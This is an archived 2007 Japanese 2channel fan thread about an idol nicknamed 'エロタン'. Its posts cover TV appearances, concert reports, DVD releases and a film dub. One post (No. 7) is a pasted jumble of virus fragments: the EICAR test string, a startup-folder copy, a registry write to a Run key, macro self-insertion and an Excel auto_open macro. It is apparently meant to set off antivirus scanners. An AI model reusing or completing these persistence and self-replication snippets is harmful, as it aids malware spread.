5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

自走Part24

1 :(・ш・`)石鹸復活オメ!キシシ:2007/02/15(木) 11:33:54 ID:4wmng9zj
   |_∧
   |ш・`)何してるのー?あそぼーよー
   |⊂
   |/

●壷の雰囲気を理解し2ネ-ムを覚えてから書き込んでね
●2ちゃんねるは芸能人を叩く場所ではありません
●書き込む際はメル欄に「sage」と必ず入れよう
●片仮名は全角ではなく半角にしてね(!や?は全角で)
●マガネタ・折木話・やらかし話禁止だよ
●安置・age厨・煽り・甜菜はスルーしてね
●ギャル文字や句読点は使用しないこと
●アンカーは「>>1」ではなく「>1」にしてね

エロスレが出来るずっと前からのズニア板のお約束です
どのユニ・どの麺の本スレでもこのお約束は守られています
マターリ平和にエロを応援していきましょう

2 :(・ш・`)過去ログも読んでくれよな:2007/02/15(木) 11:36:05 ID:4wmng9zj
【映画】ハッピーフィート(日本語吹替版)・主人公“マンブル”役 イメソン・NEWS“星をめざして”
     今春3月17日 丸の内プラゼール他、全国ロードショー
     ttp://wwws.warnerbros.co.jp/happyfeet/

【テレビ】『Ya-Ya-yah』(テレビ東京系(日) 12:24-12:53 (※地域によって放映時刻は違います)
    『世界の果てまでイッテQ!』 (日本テレビ系(日) 19:58-20:54  ttp://www.ntv.co.jp/q/

【CM】『バーモントカレー』(ハウス食品) O・A中

【CD】NEWS『星をめざして』 3月21日(水・祝)初回生産限定版・通常版 発売(JE)
    テゴマス『ミソスープ』初回生産限定版・通常版 発売中(JE)

【DVD】映画『疾走』発売中(主演・角川系) ttp://www.shissou.com/
     ドラマ『ガチバカ!』発売中(TBS) ttp://www.tbs.co.jp/gachi-baka/
     ドラマ『氷点』 2月21日発売(テレビ朝日) ttp://www.tv-asahi.co.jp/hyoten/

3 :(・ш・`)過去ログも読んでくれよな:2007/02/15(木) 11:37:05 ID:4wmng9zj
どんぐり23個目
http://tv9.2ch.net/test/read.cgi/jr/1160558864/
エロpart22
http://tv7.2ch.net/test/read.cgi/jr/1150298665/
エロスレpart21
http://tv7.2ch.net/test/read.cgi/jr/1145433318/

過去ログ 11-20
http://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/169
過去ログ 1-10
http://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/73

4 :ユー&名無しネ:2007/02/15(木) 11:38:55 ID:fEXpCcre
>1
乙カレー

5 :ユー&名無しネ:2007/02/15(木) 11:51:55 ID:4wmng9zj
    (\   
     \\      (\
     ((\\     (\\
     ( (_ヾヽ   ((\ヾ/)
     (  ( ヾ )  ( ( ヾ/)″
      し し//  し ( ((/)
バサバサ  し///ヽ ∧,,∧ //)″
       し(/// (´・ш・)/ヾ エロタンが華麗に空気の入れ替えキシシ
           (/(( O┬O
        ≡ ◎-ヽJ┴◎  キコキコ


ユニスレにならって張ってみたノシ
換気の際にドゾー

6 :ユー&名無しネ:2007/02/15(木) 11:54:00 ID:thXGro31
>1
乙!

明日のタモステwktk(*・∀・)人(・ш・`)

7 :ユー&名無しネ:2007/02/15(木) 19:43:52 ID:W0os8/IW
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


8 :ユー&名無しネ:2007/02/15(木) 21:31:20 ID:yT9RzIKs
>1
乙カレー!

タモステwktkしすぎてヤバス

9 :ユー&名無しネ:2007/02/15(木) 21:46:35 ID:apgqYs6k
イイジャン!  どうする?ヌルーしちゃう?
 ∩∩ ∧,,∧ ∧,,∧ ...∧,,∧ ええんやない
 |│| (*`レ´*)( ゚ Д゚)(´д`・)∧∧
( ´*‘) ∧∧ ( ∧,,,∧Uヾヽヽリ`▽´ノリ おやつの時間にしようよ!
| U (  ´・)ミ    ミ(‘.   )つ◎とノ
 u-u (l    )(    ) (   ノ u-u
コショコショ`u-u' `u-u' ..`u-u' コソコソ


10 :ユー&名無しネ:2007/02/15(木) 22:16:24 ID:I56KcyXv
明日エロタンが髪を切ってる事を願って…
いくらなんでももう長すぎるよ

11 :ユー&名無しネ:2007/02/15(木) 23:01:28 ID:2BxH9QW1
乙自走!

自分も髪切ってホスィ…℃っくん頼む

12 :ユー&名無しネ:2007/02/16(金) 01:08:58 ID:e3T6KNlJ
そう?似合ってると思うけどな

13 :ユー&名無しネ:2007/02/16(金) 22:01:35 ID:BN7cQ/M6
投げちゅーと腰振りがワイルドでかっこよかった

14 :ユー&名無しネ:2007/02/16(金) 22:28:59 ID:g5IBVAp7
全体的に男臭くて動揺してしまった

15 :ユー&名無しネ:2007/02/16(金) 23:32:17 ID:if9LQQcT
何か行動が目みたいだった

16 :ユー&名無しネ:2007/02/17(土) 00:02:53 ID:4U5Q7W9A
>14
まさに過去ログ(初期の頃)で盛り上がった“初々しいエロじゃない”だなw


441 名前: ユーは名無しネ 03/10/27 01:30 ID:???
>>434
行けば見れたのに…と後で思うのも虚しいよ。
今のエロは今しかみれんから見といたほうが(・∀・)イイ!!
もし仮に来年とかにチャンスがあったとしてもその頃はもう初々しいエロじゃない。

17 :ユー&名無しネ:2007/02/17(土) 00:15:40 ID:IWBXaWUq
× w
○ (w

℃ンクサスマソ

18 :ユー&名無しネ:2007/02/17(土) 07:06:01 ID:K8LZ/tze
ここは手越祐也様のスレです

19 :ユー&名無しネ:2007/02/17(土) 08:39:40 ID:Ph8v7ulX
タモステ
踊るエロタソ久しぶりに見れて生歌聴けて
なによりも嬉しそうな笑顔に目汁でだ
今日からの復活紺も笑顔イパーイでありますように
自分しうまい入れないが入れる姐さんレポできそう
ならよろですノシ

20 :ユー&名無しネ:2007/02/17(土) 09:05:31 ID:XmLWwXLq
人気投票
http://kidkidkid.hp.infoseek.co.jp/ranking/johnnysranking.html

21 :ユー&名無しネ:2007/02/17(土) 12:20:29 ID:NjP7MDms
>15
禿同
クネクネ具合といいアピの仕方がなんか(w

22 :ユー&名無しネ:2007/02/17(土) 16:36:07 ID:YU5Y8dUK
>16
ちょナツカシス(w
後列隅っこの初々しいエロがスチだったなぁ(*´∀`)
今日入ってる姐さんしっかり応援してやってくれ

23 :ユー&名無しネ:2007/02/17(土) 19:39:51 ID:O3eNn6Qu
Mステカッコ良かったぞ

24 :ユー&名無しネ:2007/02/17(土) 19:42:53 ID:O3eNn6Qu
そうだ
友達に誘われて
コンサートで間近でこの子みたんだけど印象
目のでかさが顔の半分以上ある
だった

25 :ユー&名無しネ:2007/02/17(土) 20:36:16 ID:Tg+5Je6I
エロタソのソロ曲何ダタの?

26 :ユー&名無しネ:2007/02/17(土) 23:11:41 ID:SA8XwdMI
タモステのサヤエンドウで踊りまくりなエロタンに
今まで興味なかった自分ですが惚れかけますた

踊ってるエロタンを初めてちゃんと見たよー

27 :ユー&名無しネ:2007/02/18(日) 00:33:11 ID:c2VTLG3B
>26
惚れかけかよ!(w
でも興味出てきてくれただけでもウレシス
デブ当時は通行人だったエロがここまで踊れるようになってて
自分でもビクーリだ

28 :ユー&名無しネ:2007/02/18(日) 08:17:30 ID:D6iDhy7g
ここにレポ落としていいの?

29 :ユー&名無しネ:2007/02/18(日) 09:53:40 ID:7V1HDgLG
エロタソに関することだったらおながいします(・∀・)

30 :ユー&名無しネ:2007/02/18(日) 10:40:01 ID:TAt3puv+
フライングしてるエロタンが天使に見えますた(*´∀`)

31 :ユー&名無しネ:2007/02/18(日) 11:14:23 ID:J0nkVSAl
全く興味ナカタが副担に昇格しそうなエロがいる自分が通りますよ

32 :ユー&名無しネ:2007/02/18(日) 12:17:05 ID:9Lzx+GzP
>28
是非ヨロですノシ
>31
昇格することをお待ちしてます(*´∀`)ノシ

33 :28:2007/02/18(日) 15:11:23 ID:D6iDhy7g
じゃあ自分の覚えてる限りレポしますノシ
今回はフライングやクレーン多かったんだが
エロタソで印象に残ってるのはサヤエン大サビ
バクステからフライングしながら歌うのはまさにブラボーブラボでした(w
MCはとにかく上目線エロタソで何か上目線な発言するたび
他麺が上を見上げて「エロー?どこー?」とコントになっててワロタ
ハッピーフィートの映像をチト見たんだが
最後エロの名前がデカく映ったのに会場もおおお!って感じだった
あと個人的には踊りのレベルアップぷりが凄いとオモタ
踊るだけの曲があるんだが終始見とれてしまったよ
こんな感じでスマソ また思い出したら書くノシ

34 :ユー&名無しネ:2007/02/18(日) 19:48:17 ID:Dv3Mfvno
>33
亀ながらレポdです
サヤエンフライングも上目線エロコントもダンスも禿ミタスだ(*´∀`)
Pain歌詞も噂になってたがこれから検証していきたいね
明日のWSでつかの間の紺気分を味わうよノシ

35 :ユー&名無しネ:2007/02/18(日) 21:03:04 ID:KKSJ42kt
>33
d
踊ってる姿イパーイ見たい脳
ハッピーフィートと言えばマンブルストラップがついた携帯いじってるエロが$誌に載ってたけど思ってたよりでかかったな
イッテQ衣裳の豹柄の襟が何かワロス

36 :ユー&名無しネ:2007/02/18(日) 21:45:27 ID:Dv3Mfvno
>35
$誌て先月のか脳?自分見れてナスだきっとorz
豹柄はホストかとオモタ(w

今日チケ梨でグッズだけ買いにいったがどれもビズ良好ですた
特にポスターは迷ってたがその場で衝動買いするぐらいヨカタ
パーチー集合の私服チックなエロタンもキャワだたよ
これからの姐さんがんがってゲトして下ノシ

37 :ユー&名無しネ:2007/02/18(日) 22:43:41 ID:Usmt3d0f
>33
レポdですノシ
上目線コントワロスだな(*´∀`)

イッテQは衣裳が毎回チト変だな(w
あと髪型のせいかも試練が頬がまた少し膨らんだような…
紺があるからロケは当分ないかな?
体はってガンガルとこ見てミタス
長文スマソ

38 :ユー&名無しネ:2007/02/18(日) 22:49:14 ID:1ImcujZC
>36
自分もチケ梨しかも顔見せの時は違う場所にいてorz
心も体も冷えてたけどQの豹柄チトワロスで温まりますた(w
プレミアムの最後のセピアみたいなところの笑顔にもホコーリ

39 :ユー&名無しネ:2007/02/18(日) 23:43:22 ID:obLMs9OX
自分もQ見てまたどんぐりが入ったような気がした

40 :ユー&名無しネ:2007/02/19(月) 00:12:52 ID:zsVWei7B
初日1部最初の方の歌でエロが自分のパート歌わないで
「待っててくれてありがとー!」みたいに叫んでたとこあったよね?
覚えてる姐サソ何の曲だったか教えてくださいorz

41 :ユー&名無しネ:2007/02/19(月) 01:41:54 ID:9JQnONl5
エロさん男っぽくなったな
しかし「愛してるよー」とか叫ばれると禿羞恥(w

42 :ユー&名無しネ:2007/02/19(月) 08:19:01 ID:KZc03mNZ
ズームのありがとうありがとうヨカタ

43 :ユー&名無しネ:2007/02/19(月) 09:32:51 ID:/WcCucJK
>42
あそこだけ名前テロップ出てワロタ(w
サヤエンフライング映像が定番だたね
ありゃ生で見れれば鳥肌もんだとオモタよorz
サプリで会見※も一人一人流れたらしいけど
自分見れナスだからどっかにレポ落ちるの待ちますん

44 :ユー&名無しネ:2007/02/19(月) 13:00:58 ID:Z7Xb1Rpy
サプリのレポ
パネル前で1人ずつコメ
エロ「ほんと、鰯ちゃんなんて泣いちゃいましたしー。
もう、ほんとに待っててくれて、ほんとにありがとうって感じでした」

45 :ユー&名無しネ:2007/02/19(月) 13:29:49 ID:QqeRm98h
>44
自分もサプリは捕獲できたが1人ずつの※はナカタ…_| ̄|○
サプリも何回か芸能コーナーあったっけ?

46 :44:2007/02/19(月) 14:21:18 ID:STZTTlV1
>45
いつも違うかシラネだけど
今日は違ってた
因みにコメは8時13分頃

47 :ユー&名無しネ:2007/02/19(月) 18:03:13 ID:ZOxD7cJ6
サプリは7時半過ぎと8時過ぎに芸能コーナーあるよ
天辺でフライングするエロタソと味噌汁があってウマー

48 :ユー&名無しネ:2007/02/19(月) 20:45:07 ID:PkXKS+ll
昨日紺入ってPainの歌詞メモってきたノシ
批判の声が挙がってたからどんなもんかとオモテタが
実際聴いてみると今の石鹸と石鹸担の関係みたいというか
石鹸麺が石鹸担へ宛てた想いという感じダタから思い出すだけで目汁止まらナス
批判する前に歌詞の意味を考えてみるべきかも…
携帯から長文スマソ

49 :ユー&名無しネ:2007/02/19(月) 21:03:54 ID:hy9Hxe4T
紺入れなかった自分としてはどんな詞だったのか禿知りたい

50 :ユー&名無しネ:2007/02/19(月) 21:05:04 ID:kJ5SnPeo
>48
自分はエロはポーサンの歌が本当に好きなんだなと思った
確かに複雑とか思う人も居るかもだが
一緒に歌ったり握手したりホコーリなんだがな
そして歌詞をどうにかして教えて頂きたいorz

51 :ユー&名無しネ:2007/02/19(月) 22:13:42 ID:QqeRm98h
>44 >47
教えてくれてd!
サパーリ知らなかったよ…

52 :ユー&名無しネ:2007/02/19(月) 23:45:11 ID:0+u64pdD
ZZzz....

53 :ユー&名無しネ:2007/02/20(火) 00:53:18 ID:R9NHeIH6
マイボスDVD発売決定キタ━━━━━(゚∀゚)━━━━━!!!!

☆長瀬智也主演、抱腹絶倒必至のコメディドラマ!BOXは特典ディスク付!
「マイ★ボス マイ★ヒーロー DVDーBOX」
2007年04月25日発売
[仕様] DVD4枚組+特典DVD1枚
[データ] 特典映像収録内容(予定)
●クランクイン・クランクアップ
●アグネス体操フルバージョン(第2日テレより)
●アニキンダーオープニングテーマフルバージョン

54 :ユー&名無しネ:2007/02/20(火) 01:11:27 ID:0OvoX5kI
>53
情報dd
桜なんとかDVD化キタ━━━━━━(゚∀゚)━━━━━━ !!!!
ソースないかとオモタけどドラマスレにあったから本気でウレシス
このドラマに出会えてなかったら
自分全く違う人生歩んでた鴨試練ぐらい大事な作品だよ。・゚・(ノД`)・゚・。
これでやっとピーつべに頼らなくて済む(*´∀`)
あああ4月25日wktkwktk

55 :ユー&名無しネ:2007/02/20(火) 01:20:41 ID:R9NHeIH6
ソース提示してなくてスマソ
自分は新☆堂のメルマガで知ったクチで早速予約してきたノシ
特典映像wktk

56 :ユー&名無しネ:2007/02/20(火) 06:29:36 ID:VVIF+MsD
氷点の特典映像の内容ってどうなんだろ?
未公開シーンとかあるなら買いたいんだけど
密林とかでも書いてないよね

57 :ユー&名無しネ:2007/02/20(火) 16:32:08 ID:76zLooi/
>56
いちおメイキングがあった
エロタソもクランクイン時やちょこちょことインタブや撮影シーンがあるぞ
本編の未公開シーンが収録されたのかはまだ分からん
あとはジャケット内側に辻口家の写真があって笑顔がヨカタ!

58 :ユー&名無しネ:2007/02/20(火) 18:36:34 ID:VVIF+MsD
>57
トン

マンブル試写会が当たった!
エロタンの舞台挨拶ないのかなあ…招待状には書いてないけど


59 :ユー&名無しネ:2007/02/20(火) 19:04:22 ID:wDnDfHbl
>58
姐さんオメ!
エロタン来るといいな
そして自分も明日招待状が来るといいな…

60 :ユー&名無しネ:2007/02/20(火) 19:24:18 ID:Mf6weXl7
>58
テラウラヤマシス(´・ω・`)
キャワキャワなエロタンくるといい脳

61 :ユー&名無しネ:2007/02/20(火) 19:48:13 ID:0OvoX5kI
>58
姐さんオメ!
自分2口応募したがまだ音信ナスorz
たこやき紺前だからくる可能性大だね

今日蛇店行ったがウマーな写真(パンフの麺ツーショなど)は売り切れ続出orz
エロタンと食べるシリーズをぜひともコレクソンしておきたかた(´・ω・`)
でもどれもビズテライイし白が本当に似合うなあと

長文スマソ

62 :ユー&名無しネ:2007/02/20(火) 20:54:58 ID:0JVaAr8v
>58
オメ!
舞台挨拶来るといい脳
応募してる姐さん方も良い結果くるといいねノシ
>61
売り切れ丼舞ノシ
食べるシリーズはヤフオクでしか見れてないがキャワだね

63 :ユー&名無しネ:2007/02/21(水) 19:15:33 ID:NcKVs3Rs
新Painはエロタン作詞なのかな?
禿いい歌詞で目汁だった
作詞も上達したね才能あるとオモー

64 :ユー&名無しネ:2007/02/21(水) 21:06:40 ID:usQNoxRc
>63
エロタンが作詞したとは限らない

65 :ユー&名無しネ:2007/02/21(水) 22:27:16 ID:w2egNM8W
ttp://jbbs.livedoor.jp/music/8282/

66 :ユー&名無しネ:2007/02/22(木) 00:20:27 ID:mD/No3n6
>61
パンフとかビズ良好だね
最近の$誌とかショップ写真とか見てて自分も白い衣装のエロタソが1番スチだ(*´∀`)

67 :ユー&名無しネ:2007/02/22(木) 00:36:58 ID:U27ra4fk
他担なんだけど激しすぎるダンスとお上手な歌に最近釘付けです
グッズ全買いしたくなってきますた
D誌の白衣装もショップ写真もイイ

68 :ユー&名無しネ:2007/02/22(木) 05:41:36 ID:PG+CzsF4
他担ですが失礼します
先週のタモステで興味なかったはずの友人がエロタンにおちマスタ
エロタンはじけててステチですね
これからもガンガッテください

69 :ユー&名無しネ:2007/02/22(木) 10:40:31 ID:eHxCNX4x
>67>68
他担姐さんイラッサイ
エロタソ地獄は一度はまるとナカナカ抜け出せ無いこと請け合いです(w
これからも見守っていて下さいノシ

しかしエロタソ、ハジケてみるもんだな(w

70 :ユー&名無しネ:2007/02/22(木) 11:14:12 ID:NU/hoEla
>67-68
他担姐さんたちいらっさいませノシ
タモステは担でももう一回担になり直したような気分ですた(w
控えめ弟分から上から弟分に成長中のエロタンをこれからもヨロです(*´∀`)

試写会招待状こないorz
もう当たった姐さんたちは届いてるのか脳

71 :ユー&名無しネ:2007/02/22(木) 11:43:24 ID:HtYzzDrW
エロタソの登場はナスだろうけどマンブル好きはイッテQ!

映画「ハッピーフィート」のマンブルが遊びに来るよ!
早春の上野動物園モノレールに乗ろう!
ttp://www.kotsu.metro.tokyo.jp/newsevent/news/others/2007/otr_p_200701252_h.html
2月22日〜24日・記念品贈呈

72 :ユー&名無しネ:2007/02/22(木) 13:11:48 ID:PYXPZ0uM
最近の雑誌とかだと昔よりかなり目でかく見えるんだが自分だけ?
あとちょっと痩せた?

垢抜け具合に動揺を隠せない(*´∀`)

73 :ユー&名無しネ:2007/02/22(木) 17:01:11 ID:iDd0Ypt8
かわら版にエロ登場
子供の頃鬼ごっこでスーパーの三階からジャンプしたが不死身
さすがネ申(w

74 :ユー&名無しネ:2007/02/22(木) 17:02:00 ID:NU/hoEla
ちょ日テロかわら版にエロタソでた
内容はガキのころはどんな遊びをしてたか?に対して
とにかく迷惑なガキでスーパー?の高い塀に登って飛び降りたが無傷
そんな感じだたキガス
あまりにあせってレコセットしたが時すでに遅しorz
そしてkwskもきけなかた
どなたか補足ヨロです(´・ω・`)

75 :ユー&名無しネ:2007/02/22(木) 17:20:53 ID:NU/hoEla
スマソリロってなかた
>73姐さんdです
あの服装初めて見たけどもう次の収録してるのかな?
予告ではまだあの豹柄衣装だたけど(w

76 :ユー&名無しネ:2007/02/22(木) 17:38:36 ID:iDd0Ypt8
>75
髪も切る前だし2月2日の日テレジャックと同じ衣装だとオモー
今日の為に毎日10分間HDD予約してた(w

77 :ユー&名無しネ:2007/02/22(木) 18:06:00 ID:HDXFCVy2
>76
姐さんスゴス!

78 :ユー&名無しネ:2007/02/22(木) 20:45:39 ID:NU/hoEla
>76
そうだたd
確かにスゴス(w
捕獲できてヨカタね(*´∀`)

今日のレコメンゲストくるか脳?
この前エロ升だたから今日は鰯笛かな
22時までドチドチだ

79 :ユー&名無しネ:2007/02/23(金) 01:58:01 ID:STDQZ1o8
先週のタモステでコロッとエロタンに落ちた自分が通りますよ
早速ミソスープとガチバカ買ってしまいますた
ここ見てるとタモステ出は結構いるみたいですね

80 :ユー&名無しネ:2007/02/23(金) 03:07:41 ID:Xfp3y8eT
自分がバキューンとか投げチューに大爆笑してたタモステで
こんなにエロ担姐さん達が増えてテラウレシス

上から目線に萌えるもよし
ドSなエロタソを超ドSに見守るもよし

81 :ユー&名無しネ:2007/02/23(金) 07:18:42 ID:jr3GTLHO
タモステ効果凄いな
自分もアレ見て更に好きになったが(w

82 :ユー&名無しネ:2007/02/23(金) 12:33:43 ID:bE0lytaD
エロタンてドSなのかー
何見たら分かるかな


83 :ユー&名無しネ:2007/02/23(金) 14:38:14 ID:MpHq40jb
自分は他担ですが
一度エロタンに落ちかけたましたが最近またエロタンが気になって

やはり他担からしてもドSに見えます
うちのママンは「腹黒だ!」と言いますが

でもホントにイイ男になりましたなー




84 :ユー&名無しネ:2007/02/23(金) 16:54:15 ID:N85PclkM
前から思ってたんだけど

エロの激太り と 石鹸活動休止
関係あるのか脳

85 :ユー&名無しネ:2007/02/23(金) 20:41:54 ID:EC918aMD
ユニスレで暴れてるヤシどうにかならんか脳
ここまでしつこくされるとエロやエロ担が嫌われるんじゃないかと禿心配
最近ユニスレ覗くのも勇気いるんだが…ヌルーしか策はないのか

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)